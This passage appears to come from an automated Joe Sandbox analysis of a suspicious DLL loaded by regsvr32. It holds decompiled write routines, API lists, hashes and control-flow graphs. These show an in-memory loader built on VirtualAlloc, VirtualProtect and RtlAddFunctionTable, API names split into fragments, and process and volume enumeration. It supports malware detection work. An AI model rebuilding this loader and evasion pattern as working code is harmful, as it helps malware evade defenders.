                                                                                                                                                                                                                    				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                                                                                                                                                    				r14d = r14d + 1;
                                                                                                                                                                                                                    				_v124 = r14d;
                                                                                                                                                                                                                    				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                                                                                                                                                    				goto 0x8000e038;
                                                                                                                                                                                                                    				_v128 = GetLastError();
                                                                                                                                                                                                                    				_t222 = _v88;
                                                                                                                                                                                                                    				goto 0x8000e153;
                                                                                                                                                                                                                    				r9d = r14d;
                                                                                                                                                                                                                    				_v152 = __r9;
                                                                                                                                                                                                                    				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                                                                                                                                                    				asm("movsd xmm0, [eax]");
                                                                                                                                                                                                                    				goto 0x8000e158;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                                                                                                                                                    				_t133 = _v136;
                                                                                                                                                                                                                    				_t167 = _t133;
                                                                                                                                                                                                                    				if (_t167 == 0) goto 0x8000e10c;
                                                                                                                                                                                                                    				if (_t167 == 0) goto 0x8000e0f8;
                                                                                                                                                                                                                    				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                                                                                                                                                    				r9d = r14d;
                                                                                                                                                                                                                    				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                                    				goto 0x8000e0b0;
                                                                                                                                                                                                                    				r9d = r14d;
                                                                                                                                                                                                                    				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                                    				goto 0x8000e0b0;
                                                                                                                                                                                                                    				r9d = r14d;
                                                                                                                                                                                                                    				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                                                                                                                                    				goto 0x8000e0b0;
                                                                                                                                                                                                                    				r8d = r14d;
                                                                                                                                                                                                                    				_v152 = _v152 & _t180;
                                                                                                                                                                                                                    				_v128 = _t180;
                                                                                                                                                                                                                    				_v120 = 0;
                                                                                                                                                                                                                    				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
                                                                                                                                                                                                                    				_t116 = GetLastError();
                                                                                                                                                                                                                    				_v128 = _t116;
                                                                                                                                                                                                                    				asm("movsd xmm0, [ebp-0x40]");
                                                                                                                                                                                                                    				asm("movsd [ebp-0x30], xmm0");
                                                                                                                                                                                                                    				if (_t116 != 0) goto 0x8000e1cc;
                                                                                                                                                                                                                    				_t117 = _v112;
                                                                                                                                                                                                                    				if (_t117 == 0) goto 0x8000e1a3;
                                                                                                                                                                                                                    				if (_t117 != 5) goto 0x8000e193;
                                                                                                                                                                                                                    				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
                                                                                                                                                                                                                    				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                                                                                                                                    				 *(_t184 + 0x34) = _t117;
                                                                                                                                                                                                                    				goto 0x8000df3f;
                                                                                                                                                                                                                    				_t204 = _t184;
                                                                                                                                                                                                                    				E000000011800086B0(_v112, _t204);
                                                                                                                                                                                                                    				goto 0x8000df3f;
                                                                                                                                                                                                                    				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
                                                                                                                                                                                                                    				if ( *_t206 == 0x1a) goto 0x8000e1d3;
                                                                                                                                                                                                                    				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
                                                                                                                                                                                                                    				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
                                                                                                                                                                                                                    				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                                                                                                                                    				goto 0x8000df3f;
                                                                                                                                                                                                                    				goto 0x8000e1d5;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}







































                                                                                                                                                                                                                    0x18000dee0
                                                                                                                                                                                                                    0x18000dee0
                                                                                                                                                                                                                    0x18000def6
                                                                                                                                                                                                                    0x18000defc
                                                                                                                                                                                                                    0x18000deff
                                                                                                                                                                                                                    0x18000df05
                                                                                                                                                                                                                    0x18000df0e
                                                                                                                                                                                                                    0x18000df10
                                                                                                                                                                                                                    0x18000df15
                                                                                                                                                                                                                    0x18000df18
                                                                                                                                                                                                                    0x18000df1e
                                                                                                                                                                                                                    0x18000df25
                                                                                                                                                                                                                    0x18000df2d
                                                                                                                                                                                                                    0x18000df30
                                                                                                                                                                                                                    0x18000df35
                                                                                                                                                                                                                    0x18000df3a
                                                                                                                                                                                                                    0x18000df42
                                                                                                                                                                                                                    0x18000df57
                                                                                                                                                                                                                    0x18000df5b
                                                                                                                                                                                                                    0x18000df5f
                                                                                                                                                                                                                    0x18000df67
                                                                                                                                                                                                                    0x18000df6c
                                                                                                                                                                                                                    0x18000df73
                                                                                                                                                                                                                    0x18000df7c
                                                                                                                                                                                                                    0x18000df84
                                                                                                                                                                                                                    0x18000df8b
                                                                                                                                                                                                                    0x18000df8b
                                                                                                                                                                                                                    0x18000df8f
                                                                                                                                                                                                                    0x18000df97
                                                                                                                                                                                                                    0x18000dfa9
                                                                                                                                                                                                                    0x18000dfb8
                                                                                                                                                                                                                    0x18000dfc2
                                                                                                                                                                                                                    0x18000dfc7
                                                                                                                                                                                                                    0x18000dfde
                                                                                                                                                                                                                    0x18000dfe0
                                                                                                                                                                                                                    0x18000dfe9
                                                                                                                                                                                                                    0x18000e004
                                                                                                                                                                                                                    0x18000e00a
                                                                                                                                                                                                                    0x18000e00e
                                                                                                                                                                                                                    0x18000e010
                                                                                                                                                                                                                    0x18000e019
                                                                                                                                                                                                                    0x18000e01e
                                                                                                                                                                                                                    0x18000e024
                                                                                                                                                                                                                    0x18000e028
                                                                                                                                                                                                                    0x18000e02c
                                                                                                                                                                                                                    0x18000e032
                                                                                                                                                                                                                    0x18000e034
                                                                                                                                                                                                                    0x18000e03f
                                                                                                                                                                                                                    0x18000e043
                                                                                                                                                                                                                    0x18000e048
                                                                                                                                                                                                                    0x18000e04f
                                                                                                                                                                                                                    0x18000e051
                                                                                                                                                                                                                    0x18000e055
                                                                                                                                                                                                                    0x18000e05d
                                                                                                                                                                                                                    0x18000e071
                                                                                                                                                                                                                    0x18000e073
                                                                                                                                                                                                                    0x18000e076
                                                                                                                                                                                                                    0x18000e083
                                                                                                                                                                                                                    0x18000e085
                                                                                                                                                                                                                    0x18000e08d
                                                                                                                                                                                                                    0x18000e090
                                                                                                                                                                                                                    0x18000e094
                                                                                                                                                                                                                    0x18000e099
                                                                                                                                                                                                                    0x18000e09c
                                                                                                                                                                                                                    0x18000e0ab
                                                                                                                                                                                                                    0x18000e0b0
                                                                                                                                                                                                                    0x18000e0b7
                                                                                                                                                                                                                    0x18000e0cc
                                                                                                                                                                                                                    0x18000e0ce
                                                                                                                                                                                                                    0x18000e0d2
                                                                                                                                                                                                                    0x18000e0d4
                                                                                                                                                                                                                    0x18000e0d9
                                                                                                                                                                                                                    0x18000e0de
                                                                                                                                                                                                                    0x18000e0e4
                                                                                                                                                                                                                    0x18000e0f1
                                                                                                                                                                                                                    0x18000e0f6
                                                                                                                                                                                                                    0x18000e0f8
                                                                                                                                                                                                                    0x18000e105
                                                                                                                                                                                                                    0x18000e10a
                                                                                                                                                                                                                    0x18000e10c
                                                                                                                                                                                                                    0x18000e119
                                                                                                                                                                                                                    0x18000e11e
                                                                                                                                                                                                                    0x18000e12b
                                                                                                                                                                                                                    0x18000e12e
                                                                                                                                                                                                                    0x18000e136
                                                                                                                                                                                                                    0x18000e13a
                                                                                                                                                                                                                    0x18000e145
                                                                                                                                                                                                                    0x18000e147
                                                                                                                                                                                                                    0x18000e14d
                                                                                                                                                                                                                    0x18000e153
                                                                                                                                                                                                                    0x18000e158
                                                                                                                                                                                                                    0x18000e16e
                                                                                                                                                                                                                    0x18000e170
                                                                                                                                                                                                                    0x18000e175
                                                                                                                                                                                                                    0x18000e17a
                                                                                                                                                                                                                    0x18000e17c
                                                                                                                                                                                                                    0x18000e180
                                                                                                                                                                                                                    0x18000e187
                                                                                                                                                                                                                    0x18000e18b
                                                                                                                                                                                                                    0x18000e18e
                                                                                                                                                                                                                    0x18000e196
                                                                                                                                                                                                                    0x18000e199
                                                                                                                                                                                                                    0x18000e19e
                                                                                                                                                                                                                    0x18000e1ad
                                                                                                                                                                                                                    0x18000e1b2
                                                                                                                                                                                                                    0x18000e1b4
                                                                                                                                                                                                                    0x18000e1b8
                                                                                                                                                                                                                    0x18000e1bc
                                                                                                                                                                                                                    0x18000e1c3
                                                                                                                                                                                                                    0x18000e1c7
                                                                                                                                                                                                                    0x18000e1d1
                                                                                                                                                                                                                    0x18000e1e5

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                    • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                                    • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                    			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                    				signed long long _v8;
                                                                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                                                                    				signed long long _t62;
                                                                                                                                                                                                                    				short* _t67;
                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_a8 = __rbx;
                                                                                                                                                                                                                    				_a24 = __rbp;
                                                                                                                                                                                                                    				E0000000118000F880(0x1470, __rax, _t97, _t99);
                                                                                                                                                                                                                    				_t62 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				_a5176 = _t62 ^ _t91 - __rax;
                                                                                                                                                                                                                    				r14d = r9d;
                                                                                                                                                                                                                    				r10d = r10d & 0x0000003f;
                                                                                                                                                                                                                    				_t103 = _t102 + __r8;
                                                                                                                                                                                                                    				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
                                                                                                                                                                                                                    				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                                                                                                                                    				if (__r8 - _t103 >= 0) goto 0x8000dd91;
                                                                                                                                                                                                                    				_t67 =  &_a40;
                                                                                                                                                                                                                    				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
                                                                                                                                                                                                                    				_t41 =  *__r8 & 0x0000ffff;
                                                                                                                                                                                                                    				if (_t41 != 0xa) goto 0x8000dce6;
                                                                                                                                                                                                                    				 *_t67 = 0xd;
                                                                                                                                                                                                                    				_t68 = _t67 + 2;
                                                                                                                                                                                                                    				 *_t68 = _t41;
                                                                                                                                                                                                                    				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
                                                                                                                                                                                                                    				_a16 = _a16 & 0x00000000;
                                                                                                                                                                                                                    				_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                                    				_v0 = 0xd55;
                                                                                                                                                                                                                    				_v8 =  &_a1752;
                                                                                                                                                                                                                    				r9d = 0;
                                                                                                                                                                                                                    				E0000000118000A154();
                                                                                                                                                                                                                    				if (0 == 0) goto 0x8000dd89;
                                                                                                                                                                                                                    				if (0 == 0) goto 0x8000dd79;
                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				r8d = r8d;
                                                                                                                                                                                                                    				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
                                                                                                                                                                                                                    				if (0 + _a24 < 0) goto 0x8000dd46;
                                                                                                                                                                                                                    				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                                                                                                                                                    				goto 0x8000dcbd;
                                                                                                                                                                                                                    				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                                                                                                                                                    				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                    0x18000dc50
                                                                                                                                                                                                                    0x18000dc55
                                                                                                                                                                                                                    0x18000dc67
                                                                                                                                                                                                                    0x18000dc6f
                                                                                                                                                                                                                    0x18000dc79
                                                                                                                                                                                                                    0x18000dc8a
                                                                                                                                                                                                                    0x18000dc98
                                                                                                                                                                                                                    0x18000dc9c
                                                                                                                                                                                                                    0x18000dcb4
                                                                                                                                                                                                                    0x18000dcba
                                                                                                                                                                                                                    0x18000dcbd
                                                                                                                                                                                                                    0x18000dcc3
                                                                                                                                                                                                                    0x18000dccb
                                                                                                                                                                                                                    0x18000dccd
                                                                                                                                                                                                                    0x18000dcd8
                                                                                                                                                                                                                    0x18000dcdf
                                                                                                                                                                                                                    0x18000dce2
                                                                                                                                                                                                                    0x18000dce6
                                                                                                                                                                                                                    0x18000dcf8
                                                                                                                                                                                                                    0x18000dcfa
                                                                                                                                                                                                                    0x18000dd05
                                                                                                                                                                                                                    0x18000dd13
                                                                                                                                                                                                                    0x18000dd26
                                                                                                                                                                                                                    0x18000dd2b
                                                                                                                                                                                                                    0x18000dd35
                                                                                                                                                                                                                    0x18000dd3e
                                                                                                                                                                                                                    0x18000dd44
                                                                                                                                                                                                                    0x18000dd46
                                                                                                                                                                                                                    0x18000dd5b
                                                                                                                                                                                                                    0x18000dd64
                                                                                                                                                                                                                    0x18000dd6f
                                                                                                                                                                                                                    0x18000dd77
                                                                                                                                                                                                                    0x18000dd7e
                                                                                                                                                                                                                    0x18000dd84
                                                                                                                                                                                                                    0x18000dd8f
                                                                                                                                                                                                                    0x18000ddbf

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                    • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                                    • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                    • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                                    • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1693014935-3110715001
                                                                                                                                                                                                                    • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                                    • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:15.7%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                    Total number of Nodes:38
                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                    execution_graph 3056 151a7f0 3057 151a80b 3056->3057 3058 151a8bc 3057->3058 3060 152020c 3057->3060 3062 152022b 3060->3062 3063 1520590 3062->3063 3064 152e310 3062->3064 3063->3058 3065 152e423 3064->3065 3066 152e5f6 3065->3066 3068 15140a0 3065->3068 3066->3062 3070 1514116 3068->3070 3069 15141ca GetVolumeInformationW 3069->3066 3070->3069 3071 1210000 3075 121015a 3071->3075 3072 121033f GetNativeSystemInfo 3073 1210377 VirtualAlloc 3072->3073 3077 12108eb 3072->3077 3074 1210395 VirtualAlloc 3073->3074 3080 12103aa 3073->3080 3074->3080 3075->3072 3075->3077 3076 1210873 3076->3077 3078 12108c6 RtlAddFunctionTable 3076->3078 3078->3077 3079 121084b VirtualProtect 3079->3080 3080->3076 3080->3079 3099 1532ab0 3102 1532aea 3099->3102 3100 1532c51 3101 152e9e8 Process32FirstW 3101->3102 3102->3100 3102->3101 3081 152e9e8 3084 1518bc8 3081->3084 3083 152eab4 3086 1518c02 3084->3086 3085 1518eb8 3085->3083 3086->3085 3087 1518d6f Process32FirstW 3086->3087 3087->3086 3088 15180cc 3091 15180f3 3088->3091 3089 15182ba 3091->3089 3092 152e9e8 3091->3092 3093 1518bc8 Process32FirstW 3092->3093 3094 152eab4 3093->3094 3094->3091

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 1210000-121029a call 121091c * 2 13 12102a0-12102a4 0->13 14 1210905 0->14 13->14 16 12102aa-12102ae 13->16 15 1210907-121091a 14->15 16->14 17 12102b4-12102b8 16->17 17->14 18 12102be-12102c5 17->18 18->14 19 12102cb-12102dc 18->19 19->14 20 12102e2-12102eb 19->20 20->14 21 12102f1-12102fc 20->21 21->14 22 1210302-1210312 21->22 23 1210314-121031a 22->23 24 121033f-1210371 GetNativeSystemInfo 22->24 25 121031c-1210324 23->25 24->14 26 1210377-1210393 VirtualAlloc 24->26 29 1210326-121032a 25->29 30 121032c-121032d 25->30 27 1210395-12103a8 VirtualAlloc 26->27 28 12103aa-12103ae 26->28 27->28 31 12103b0-12103c2 28->31 32 12103dc-12103e3 28->32 33 121032f-121033d 29->33 30->33 34 12103d4-12103d8 31->34 35 12103e5-12103f9 32->35 36 12103fb-1210417 32->36 33->24 33->25 37 12103c4-12103d1 34->37 38 12103da 34->38 35->35 35->36 39 1210419-121041a 36->39 40 1210458-1210465 36->40 37->34 38->36 41 121041c-1210422 39->41 42 1210537-1210542 40->42 43 121046b-1210472 40->43 44 1210424-1210446 41->44 45 1210448-1210456 41->45 46 12106e6-12106ed 42->46 47 1210548-1210559 42->47 43->42 48 1210478-1210485 43->48 44->44 44->45 45->40 45->41 50 12106f3-1210707 46->50 51 12107ac-12107c3 46->51 52 1210562-1210565 47->52 48->42 49 121048b-121048f 48->49 53 121051b-1210525 49->53 56 12107a9-12107aa 50->56 57 121070d 50->57 58 12107c9-12107cd 51->58 59 121087a-121088d 51->59 54 1210567-1210574 52->54 55 121055b-121055f 52->55 64 1210494-12104a8 53->64 65 121052b-1210531 53->65 60 121057a-121057d 54->60 61 121060d-1210619 54->61 55->52 56->51 62 1210712-1210736 57->62 63 12107d0-12107d3 58->63 80 12108b3-12108ba 59->80 81 121088f-121089a 59->81 60->61 68 1210583-121059b 60->68 72 12106e2-12106e3 61->72 73 121061f 61->73 89 1210796-121079f 62->89 90 1210738-121073e 62->90 70 12107d9-12107e9 63->70 71 121085f-121086d 63->71 66 12104aa-12104cd 64->66 67 12104cf-12104d3 64->67 65->42 65->49 75 1210518-1210519 66->75 76 12104e3-12104e7 67->76 77 12104d5-12104e1 67->77 68->61 78 121059d-121059e 68->78 82 12107eb-12107ed 70->82 83 121080d-121080f 70->83 71->63 74 1210873-1210874 71->74 72->46 84 1210625-1210648 73->84 74->59 75->53 87 12104e9-12104fc 76->87 88 12104fe-1210502 76->88 85 1210511-1210515 77->85 86 12105a0-1210605 78->86 94 12108eb-1210903 80->94 95 12108bc-12108c4 80->95 91 12108ab-12108b1 81->91 92 12107fb-121080b 82->92 93 12107ef-12107f9 82->93 96 1210811-1210820 83->96 97 1210822-121082b 83->97 110 12106b2-12106b7 84->110 111 121064a-121064b 84->111 85->75 86->86 98 1210607 86->98 87->85 88->75 105 1210504-121050e 88->105 89->62 104 12107a5-12107a6 89->104 99 1210740-1210746 90->99 100 1210748-1210754 90->100 91->80 101 121089c-12108a8 91->101 106 121082e-121083d 92->106 93->106 94->15 95->94 103 12108c6-12108e9 RtlAddFunctionTable 95->103 96->106 97->106 98->61 107 121077b-121078d 99->107 108 1210764-1210776 100->108 109 1210756-1210757 100->109 101->91 103->94 104->56 105->85 112 121084b-121085c VirtualProtect 106->112 113 121083f-1210845 106->113 107->89 125 121078f-1210794 107->125 108->107 116 1210759-1210762 109->116 118 12106b9-12106bd 110->118 119 12106ce-12106d8 110->119 117 121064e-1210651 111->117 112->71 113->112 116->108 116->116 122 1210653-1210659 117->122 123 121065b-1210666 117->123 118->119 120 12106bf-12106c3 118->120 119->84 124 12106de-12106df 119->124 120->119 129 12106c5 120->129 126 121068d-12106a3 122->126 127 1210676-1210688 123->127 128 1210668-1210669 123->128 124->72 125->90 132 12106a5-12106aa 126->132 133 12106ac 126->133 127->126 130 121066b-1210674 128->130 129->119 130->127 130->130 132->117 133->110
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000002.886558562.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_1210000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                                    • API String ID: 394283112-3605381585
                                                                                                                                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction ID: 7aa6a759d099c5766bd0dc881daa94cff757a99f40a67ba070365b28669cfb52
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6522530628B498FD719DF18D8857BAB7E1FB94300F14462DE98BC7255DB34E482CB8A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 305 15140a0-1514136 call 1529f38 308 15141ca-1514202 GetVolumeInformationW 305->308 309 151413c-15141c4 call 151a940 305->309 309->308
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE ref: 015141EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000002.886899027.0000000001511000.00000020.00001000.00020000.00000000.sdmp, Offset: 01511000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_1511000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InformationVolume
